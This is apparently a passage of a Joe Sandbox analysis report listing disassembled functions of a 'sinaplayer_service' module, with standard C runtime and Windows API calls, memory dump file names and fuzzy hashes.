                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09F9DA,?,?,?,?), ref: 6D0DAE14
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfo_wcsnlenwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1691615764-0
                                                                                                                                                                                                    • Opcode ID: 631feb57216fc7cc9bcf2e46025d02974ae9fecda9da9588246740691b6e7b12
                                                                                                                                                                                                    • Instruction ID: 002e8d33e95b1cb7f3926280256b5c032eab661c6d46991e4da4c9f25e8851bd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 631feb57216fc7cc9bcf2e46025d02974ae9fecda9da9588246740691b6e7b12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9041B171A08312ABFB118F68DC80F6A7BACAF56724F655526FA148F290E770C940D792
                                                                                                                                                                                                    Function 6D0AF404 Relevance: 19.6, APIs: 13, Instructions: 143stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strnlen.MSVCR120(?,?,?,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0AF424
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(?,?,00000100,?,000000FF,00000000,00000000,?,00000001,?,?,?,?,?,6D0AF52F,?), ref: 6D0AF45A
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(?,?,00000100,?,000000FF,00000000,00000000,?,00000001,?,?,?,?,6D0AF52F,?,?), ref: 6D0AF4D4
                                                                                                                                                                                                    • strcpy_s.MSVCR120(?,?,00000000), ref: 6D0AF4E9
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000), ref: 6D0AF4F4
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAA5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAAF
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAABE
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAC9
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAF2
                                                                                                                                                                                                    • malloc.MSVCR120(00000008,?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAAFC
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0AF52F,?,?,?,?), ref: 6D0DAB17
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,6D0AF52F,?,?), ref: 6D0DAB24
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfomallocstrcpy_sstrnlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2821879312-0
                                                                                                                                                                                                    • Opcode ID: ca22b558267106f22e1622c41c2ae57fad1d457daf76ef4ede9751e7ea138cf0
                                                                                                                                                                                                    • Instruction ID: adcf596c9afdc2e431d242273770bb71997ec3a6a1209334f0764f7e52bf5b93
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca22b558267106f22e1622c41c2ae57fad1d457daf76ef4ede9751e7ea138cf0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C41E571748307AFFB158FA8CC80FAA7BE8EF16724F25415AF6148F291D77488818762
                                                                                                                                                                                                    Function 6D094BF0 Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6D094C2A
                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6D0D42DF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0D42E9
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D42F0
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D430D
                                                                                                                                                                                                    • calloc.MSVCR120(?,00000002), ref: 6D0D4322
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4333
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4340
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D434B
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D4359
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D435F
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D4376
                                                                                                                                                                                                    • _wgetcwd.MSVCR120(?,?), ref: 6D0D4387
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_invalid_parameter_noinfo_wgetcwdcalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3145916893-0
                                                                                                                                                                                                    • Opcode ID: 61621bbda9e1ab971d1d2b870604da80884f05ecd70ec726daa97ca8aa52c216
                                                                                                                                                                                                    • Instruction ID: aa4792f9fc87b1e2a7fceca9b6cb5677443da29ff1c3a92b12f928c6f9ca4c07
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61621bbda9e1ab971d1d2b870604da80884f05ecd70ec726daa97ca8aa52c216
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F121977550830BBFFB419FA8DC4077E37ACBB497A4F524427FA208B090DB71C84196A5
                                                                                                                                                                                                    Function 6D146878 Relevance: 19.6, APIs: 13, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6D146881
                                                                                                                                                                                                    • _clogf.LIBCMT(?,?), ref: 6D146899
                                                                                                                                                                                                      • Part of subcall function 6D146155: _crealf.LIBCMT(?,?), ref: 6D146163
                                                                                                                                                                                                      • Part of subcall function 6D146155: _cimagf.LIBCMT(?,?,?,?), ref: 6D146171
                                                                                                                                                                                                      • Part of subcall function 6D146155: _fdtest.MSVCR120(?,?,?,?,?), ref: 6D14617D
                                                                                                                                                                                                      • Part of subcall function 6D146155: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6D146189
                                                                                                                                                                                                      • Part of subcall function 6D146155: __FCbuild.LIBCMT ref: 6D14635A
                                                                                                                                                                                                    • __FCmulcc.LIBCMT ref: 6D1468A6
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _crealf.LIBCMT(?,?,00000000,?,?,?), ref: 6D1467BE
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _cimagf.LIBCMT(?,?,?,?,00000000,?,?,?), ref: 6D1467CC
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _crealf.LIBCMT(00000000,?,?,?,?,?,00000000,?,?,?), ref: 6D1467DA
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: _cimagf.LIBCMT(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 6D1467E8
                                                                                                                                                                                                      • Part of subcall function 6D1467B2: __FCbuild.LIBCMT(?,?,?,?,?,?,00000000,?,?,?), ref: 6D14682A
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,00000000,?,?,?), ref: 6D1468AD
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _crealf.LIBCMT(?,?), ref: 6D145AB5
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _cimagf.LIBCMT(?,?,?,?), ref: 6D145AC3
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _fdtest.MSVCR120(?,?,?,?,?), ref: 6D145ACF
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6D145ADB
                                                                                                                                                                                                      • Part of subcall function 6D145AA8: __FCbuild.LIBCMT ref: 6D145C51
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6D1468BD
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6D1468D9
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6D1468E2
                                                                                                                                                                                                    • __FCmulcr.LIBCMT ref: 6D1468F0
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,?), ref: 6D1468F7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _cimagf$_crealf$_fdtest$Cbuild$_cexpf$CmulccCmulcr_clogf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3754504586-0
                                                                                                                                                                                                    • Opcode ID: a4e0e409156d489dbc52ffeb8f4004f6c55a932f874404115945202b3e0087a7
                                                                                                                                                                                                    • Instruction ID: e4576c7ec86990a3dbf883e9d31ffdb84237f9b1f98a080a64f592d916f1849a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4e0e409156d489dbc52ffeb8f4004f6c55a932f874404115945202b3e0087a7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7511517214C10EFEDF052F60EC409ED7B69EF44328F12C856FA58250A4DB734970AB55
                                                                                                                                                                                                    Function 6D0F46A1 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 260threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0F46D4
                                                                                                                                                                                                      • Part of subcall function 6D11DD30: std::exception::_Copy_str.LIBCMT(?,?,?,6D11DD23,?,?,?,6D0DB529,Attempted a typeid of NULL pointer!,6D0940D0,00000014), ref: 6D11DD49
                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCMT ref: 6D0F4714
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0F4732
                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 6D0F473B
                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCMT ref: 6D0F474E
                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 6D0F476A
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0F47A0
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8), ref: 6D0F47B7
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0F498E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$FindMatchingNode::ProcessorSchedulingSpinVirtualstd::exception::exception$Base::Concurrency@@ContextCopy_strExceptionInternalOnce@?$_OversubscribedProcResetSwitchThreadThrowWait@$00@details@freestd::exception::_
                                                                                                                                                                                                    • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                    • API String ID: 1266909556-3650809737
                                                                                                                                                                                                    • Opcode ID: e897a5810d0f81e989391d9db97ff5b10916bcafa147623db8d222eb52e227b5
                                                                                                                                                                                                    • Instruction ID: 8014f5cfae1ffa3e7fd230f6d797a745063dac5f980333368a08fbae2eb80744
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e897a5810d0f81e989391d9db97ff5b10916bcafa147623db8d222eb52e227b5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BB14A34A04706EFEB04CF28C580AAAB7F5FF89314F21856DED6587255DB70E946CB90
                                                                                                                                                                                                    Function 6D0AC264 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 222COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wsopen_s.MSVCR120(?,?,00000000,?,00000180,?,00000000,?,?,?,?,6D0AC22A,?,?,?,00000000), ref: 6D0AC32B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wsopen_s
                                                                                                                                                                                                    • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                                                                                                                                                                                    • API String ID: 2316899696-3573488595
                                                                                                                                                                                                    • Opcode ID: 759a03515ef5887c000bad5283b465cf988311a87018b777f7db5fbbdd6a505c
                                                                                                                                                                                                    • Instruction ID: 34db26ded26d325bf2029708db923374842c770c5033787d6272617782a330db
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 759a03515ef5887c000bad5283b465cf988311a87018b777f7db5fbbdd6a505c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 186158B6D5C307E9F7119EE9880437D7AE0FB12314F5E802AED58EB182F6758E408369
                                                                                                                                                                                                    Function 6D101931 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 210COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D101962
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D10196D
                                                                                                                                                                                                    • _mbsnbcmp.MSVCR120(ccs,?,00000003,?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D101AC9
                                                                                                                                                                                                    • _mbsnbicmp.MSVCR120(?,UTF-8,00000005), ref: 6D101AFC
                                                                                                                                                                                                    • _mbsnbicmp.MSVCR120(?,UTF-16LE,00000008), ref: 6D101B1B
                                                                                                                                                                                                    • _mbsnbicmp.MSVCR120(?,UNICODE,00000007), ref: 6D101B3A
                                                                                                                                                                                                    • __sopen_s.LIBCMT(?,?,00000109,?,00000180,?,00000000,?,?,?,?,6D101D7B,?,?,?,00000000), ref: 6D101B74
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _mbsnbicmp$__sopen_s_errno_invalid_parameter_noinfo_mbsnbcmp
                                                                                                                                                                                                    • String ID: UNICODE$UTF-16LE$UTF-8$ccs
                                                                                                                                                                                                    • API String ID: 2257928776-3573488595
                                                                                                                                                                                                    • Opcode ID: 21c2a8bd44f4a4f509d04756369b7a37894e15513fa4d84b1a3ed544f2059096
                                                                                                                                                                                                    • Instruction ID: 4de4e6e2844b7b35901066da0324558923079bd0beb8cabf75dfc969a077ff2c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21c2a8bd44f4a4f509d04756369b7a37894e15513fa4d84b1a3ed544f2059096
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5513972E5C283DAE7017F6888447B57BA5BF2631CF168069ED90D618EEFFC85C18611
                                                                                                                                                                                                    Function 6D0EEEBE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,6D160AA4,?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004), ref: 6D0EEECD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EEED9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EEEE0
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EEEEE
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000000,6D0A7B2D,0000FFFF,6D0D25E8,?,00000000), ref: 6D0EEF0A
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002), ref: 6D0EEF4C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D15CF40,6D15CF40,?,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0EEF5A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionInformationLogicalProcessorThrowmallocstd::exception::exception
                                                                                                                                                                                                    • String ID: %m$%m
                                                                                                                                                                                                    • API String ID: 1610761817-510220735
                                                                                                                                                                                                    • Opcode ID: c78ba2423fac0f4242b4b74d3cc5fd7b4f644bd85ad69cd0870a79db5b9ebd08
                                                                                                                                                                                                    • Instruction ID: 4d73b104c7e81e70f5fdc047b9789088a4b0e08a2e3f6d1f215d6d8d0391a81b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c78ba2423fac0f4242b4b74d3cc5fd7b4f644bd85ad69cd0870a79db5b9ebd08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE01963554815E9FFB01EBA6DC44BBFB7B8BB42280B544456F910E2186EB70990586B2
                                                                                                                                                                                                    Function 6D0A250B Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000050), ref: 6D0A2532
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A2548
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A256D
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6D0A1C46
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6D0A1C5B
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6D0A1C77
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0E0155
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0E015E
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000), ref: 6D0E0164
                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6D0E0170
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0E0176
                                                                                                                                                                                                    • free.MSVCR120(?,?,?), ref: 6D0E017F
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?), ref: 6D0E0188
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0E0198
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0E01A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$InfoLocale__crt_calloc_crt_malloc_crt$___free_lconv_monmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1790976588-0
